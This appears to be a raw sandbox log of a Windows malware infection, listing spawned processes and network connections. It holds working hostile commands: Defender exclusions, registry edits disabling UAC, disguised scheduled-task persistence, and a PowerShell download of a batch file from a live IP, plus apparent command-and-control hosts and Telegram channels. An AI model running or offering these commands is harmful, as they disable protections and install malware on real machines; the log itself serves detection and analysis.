C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe
"C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
"C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
C:\Users\Admin\AppData\Local\Temp\Files\builder.exe
"C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"
C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\crack.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"
C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe
"C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe"
C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe
"C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5604 -ip 5604
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 712
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9021.tmp\9022.tmp\9023.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"
C:\Users\Admin\AppData\Local\Temp\Files\4434.exe
"C:\Users\Admin\AppData\Local\Temp\Files\4434.exe"
C:\Windows\system32\mshta.exe
mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE
"C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9E3A.tmp\9E3B.tmp\9E3C.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\66F5uGiqJAOk.bat" "
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
C:\Windows\system32\reg.exe
reg query HKEY_CLASSES_ROOT\http\shell\open\command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd2b4a46f8,0x7ffd2b4a4708,0x7ffd2b4a4718
C:\Windows\SysWOW64\timeout.exe
timeout 1
C:\Windows\system32\attrib.exe
attrib +s +h d:\net
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2476 /prefetch:8
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y1zWGyz3dY2Y.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nji9VoGgO53z.bat" "
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe
"C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe"
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1uotMJjAf1rr.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 /prefetch:8
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\ProgramData\javaw.exe
C:\ProgramData\javaw.exe
C:\Windows\system32\WerFaultSecure.exe
"C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 3224 -i 3224 -h 416 -j 408 -s 448 -d 6092
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 47024 -ip 47024
C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe
"C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 47024 -s 304
C:\Windows\system32\WerFaultSecure.exe
C:\Windows\system32\WerFaultSecure.exe -u -p 3224 -s 1228
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe > nul
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aTrKFTKtFFLY.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scgvYUqhnL4t.bat" "
C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe"
C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S4XNjx3QJkt7.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe
"C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe"
C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe
"C:\Users\Admin\AppData\Local\Temp\Files\tdrpl.exe"
C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe
"C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5336 /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q3k6WSWS4tTa.bat" "
C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\Edge.exe
"C:\Users\Admin\AppData\Local\Temp\Edge.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe
"C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe"
C:\Users\Admin\AppData\Local\Temp\Files\t1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\t1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe
"C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe"
C:\Windows\system32\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugCvnfQWROW5.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\djJ6SAoRVT0p.bat" "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | dev.cyberark-igiwax.com | udp |
| US | 44.243.209.238:80 | dev.cyberark-igiwax.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 238.209.243.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | alien-training.com | udp |
| IE | 52.218.61.44:80 | alien-training.com | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 192.168.2.15:443 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 44.61.218.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | exchange-reasonably.gl.at.ply.gg | udp |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | rddissisifigifidi.net | udp |
| RU | 185.215.113.66:80 | rddissisifigifidi.net | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| BG | 87.120.125.214:443 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| VN | 14.243.221.170:2654 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| SE | 193.233.255.106:69 | tcp | |
| US | 147.185.221.17:30620 | exchange-reasonably.gl.at.ply.gg | tcp |
| BG | 87.120.125.214:443 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| BG | 87.120.125.214:443 | tcp | |
| BG | 87.120.125.214:443 | tcp | |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| PE | 161.132.57.101:80 | www.grupodulcemar.pe | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | millyscroqwp.shop | udp |
| US | 8.8.8.8:53 | locatedblsoqp.shop | udp |
| US | 8.8.8.8:53 | traineiwnqo.shop | udp |
| US | 8.8.8.8:53 | condedqpwqm.shop | udp |
| US | 8.8.8.8:53 | evoliutwoqm.shop | udp |
| US | 8.8.8.8:53 | stagedchheiqwo.shop | udp |
| US | 8.8.8.8:53 | stamppreewntnq.shop | udp |
| US | 8.8.8.8:53 | caffegclasiqwp.shop | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
